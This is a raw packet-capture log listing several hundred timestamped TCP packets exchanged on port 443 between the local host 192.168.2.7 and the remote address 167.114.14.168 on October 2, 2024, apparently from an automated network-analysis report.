                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806495905 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806972027 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806988001 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.807039022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.807046890 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.807080030 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.894150972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.894179106 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.894350052 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.894406080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.894457102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.894484997 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.894504070 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.894539118 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.894546032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.894573927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.894589901 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.908646107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.908674955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.908792973 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.908833027 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.908875942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.908993006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.909008980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.909060955 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.909068108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.909099102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.909394026 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.909410000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.909461975 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.909470081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.909502029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910018921 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910038948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910079956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910087109 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910108089 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910124063 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910521984 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910537958 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910589933 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910598993 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910634041 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910842896 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910857916 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910909891 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910917044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.910950899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.997026920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.997056961 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.997189999 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.997220993 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.997270107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.997473001 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.997488976 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.997541904 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.997550011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.997590065 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.013600111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.013621092 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.013709068 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.013741970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.013787985 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.014116049 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.014132023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.014189005 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.014195919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.014251947 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.014499903 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.014514923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.014561892 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.014569044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.014594078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.014614105 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015017986 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015033960 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015093088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015100002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015140057 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015362978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015377998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015434027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015441895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015480042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015867949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015882969 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015942097 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015949011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.015989065 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.087503910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.087539911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.087676048 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.087718010 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.087764978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.087990046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.088012934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.088071108 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.088078022 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.088114977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.104142904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.104165077 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.104266882 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.104285955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.104326963 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.104568005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.104583979 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.104641914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.104649067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.104684114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105082035 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105098963 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105155945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105161905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105199099 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105499029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105515003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105571985 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105578899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105617046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105931044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.105951071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.106003046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.106010914 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.106050014 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.106242895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.106262922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.106312990 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.106324911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.106364012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.178330898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.178354025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.178400040 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.178422928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.178440094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.178456068 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.178852081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.178868055 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.178920031 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.178926945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.178960085 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.194956064 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.194983006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195048094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195065975 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195111036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195171118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195187092 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195255041 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195255041 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195261955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195296049 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195625067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195645094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195677996 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195683002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195704937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.195727110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.196082115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.196096897 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.196131945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.196139097 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.196163893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.196180105 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.196700096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.196715117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.196763039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.196773052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.196805000 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.197045088 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.197060108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.197105885 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.197112083 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.197144032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.268843889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.268867016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.268992901 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.269017935 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.269059896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.269323111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.269339085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.269393921 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.269402981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.269439936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.285173893 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.285193920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.285300970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.285317898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.285355091 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.285578012 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.285593033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.285650015 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.285655022 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.285696030 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286011934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286027908 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286067009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286077976 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286099911 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286120892 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286490917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286504984 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286556959 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286565065 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286590099 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.286608934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.287074089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.287091970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.287152052 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.287159920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.287194967 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.287568092 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.287580967 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.287642002 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.287650108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.287683964 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.359354973 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.359376907 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.359586954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.359611988 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.359654903 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.359735966 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.359752893 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.359805107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.359811068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.359843969 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.375696898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.375716925 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.375811100 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.375830889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.375869989 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.376172066 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.376187086 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.376236916 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.376244068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.376281977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.376647949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.376663923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.376713991 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.376720905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.376754999 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.377141953 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.377157927 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.377213955 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.377219915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.377254963 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.377686977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.377702951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.377758980 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.377765894 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.377801895 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.378025055 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.378040075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.378097057 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.378103971 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.378139973 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450486898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450546980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450648069 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450675011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450702906 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450715065 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450725079 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450747967 CEST44349713167.114.14.168192.168.2.7
